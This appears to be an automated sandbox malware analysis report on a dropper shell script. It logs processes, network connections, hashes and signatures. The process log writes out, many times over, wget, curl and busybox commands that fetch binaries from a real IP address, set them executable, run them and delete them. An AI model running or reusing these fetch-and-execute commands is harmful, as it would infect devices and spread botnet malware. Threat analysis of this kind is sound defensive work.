[chmod 777 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X

[./KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/rm

[rm KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/usr/bin/wget

[wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/chmod

[chmod 777 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR

[./hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/rm

[rm hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/usr/bin/wget

[wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/chmod

[chmod 777 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b

[./rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/rm

[rm rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/usr/bin/wget

[wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/chmod

[chmod 777 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w

[./6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/rm

[rm 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/usr/bin/wget

[wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/chmod

[chmod 777 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda

[./xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/rm

[rm xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-10 01:07

Reported

2024-11-10 01:09

Platform

debian9-mipsel-20240611-en

Max time kernel

69s

Max time network

71s

Command Line

[/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR N/A
N/A /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b N/A
N/A /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy N/A
N/A /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X N/A
N/A /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w N/A
N/A /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda N/A
N/A /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs N/A
N/A /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM N/A
N/A /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C N/A
N/A /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp N/A
N/A /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK N/A
N/A /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE N/A
N/A /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe N/A
N/A /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw N/A
N/A /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM N/A
N/A /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C N/A
N/A /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs N/A
N/A /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE N/A
N/A /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe N/A
N/A /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw N/A
N/A /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp N/A
N/A /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK N/A
N/A /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy N/A
N/A /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X N/A
N/A /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR N/A
N/A /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b N/A
N/A /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w N/A
N/A /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /usr/bin/curl N/A
File opened for modification /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w /usr/bin/curl N/A
File opened for modification /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w /usr/bin/curl N/A
File opened for modification /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /usr/bin/curl N/A
File opened for modification /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy /usr/bin/curl N/A
File opened for modification /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda /usr/bin/curl N/A
File opened for modification /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /usr/bin/curl N/A
File opened for modification /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK /usr/bin/curl N/A
File opened for modification /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw /usr/bin/curl N/A
File opened for modification /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp /usr/bin/curl N/A
File opened for modification /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b /usr/bin/curl N/A
File opened for modification /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /usr/bin/curl N/A
File opened for modification /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda /usr/bin/curl N/A
File opened for modification /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR /usr/bin/curl N/A
File opened for modification /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy /usr/bin/curl N/A
File opened for modification /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe /usr/bin/curl N/A
File opened for modification /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /usr/bin/curl N/A
File opened for modification /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X /usr/bin/curl N/A
File opened for modification /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw /usr/bin/curl N/A
File opened for modification /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b /usr/bin/curl N/A
File opened for modification /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /usr/bin/curl N/A
File opened for modification /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /usr/bin/curl N/A
File opened for modification /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe /usr/bin/curl N/A
File opened for modification /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X /usr/bin/curl N/A
File opened for modification /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /usr/bin/curl N/A
File opened for modification /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR /usr/bin/curl N/A
File opened for modification /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp /usr/bin/curl N/A
File opened for modification /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK /usr/bin/curl N/A

Processes

/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh

[/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/chmod

[chmod 777 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR

[./hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/rm

[rm hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/usr/bin/wget

[wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/chmod

[chmod 777 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b

[./rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/rm

[rm rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/usr/bin/wget

[wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/chmod

[chmod 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy

[./FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/rm

[rm FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/usr/bin/wget

[wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/chmod

[chmod 777 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X

[./KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/rm

[rm KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/usr/bin/wget

[wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/chmod

[chmod 777 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w

[./6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/rm

[rm 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/usr/bin/wget

[wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/chmod

[chmod 777 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda

[./xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/rm

[rm xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/usr/bin/wget

[wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/chmod

[chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs

[./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/rm

[rm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/usr/bin/wget

[wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/chmod

[chmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM

[./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/rm

[rm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/usr/bin/wget

[wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/chmod

[chmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C

[./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/rm

[rm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/usr/bin/wget

[wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/chmod

[chmod 777 KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp

[./KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/rm

[rm KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/usr/bin/wget

[wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/chmod

[chmod 777 EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK

[./EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/rm

[rm EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/usr/bin/wget

[wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/chmod

[chmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE

[./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/rm

[rm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/usr/bin/wget

[wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/chmod

[chmod 777 ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe

[./ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/rm

[rm ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/usr/bin/wget

[wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/chmod

[chmod 777 giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw

[./giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/rm

[rm giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/usr/bin/wget

[wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/chmod

[chmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM

[./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/rm

[rm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/usr/bin/wget

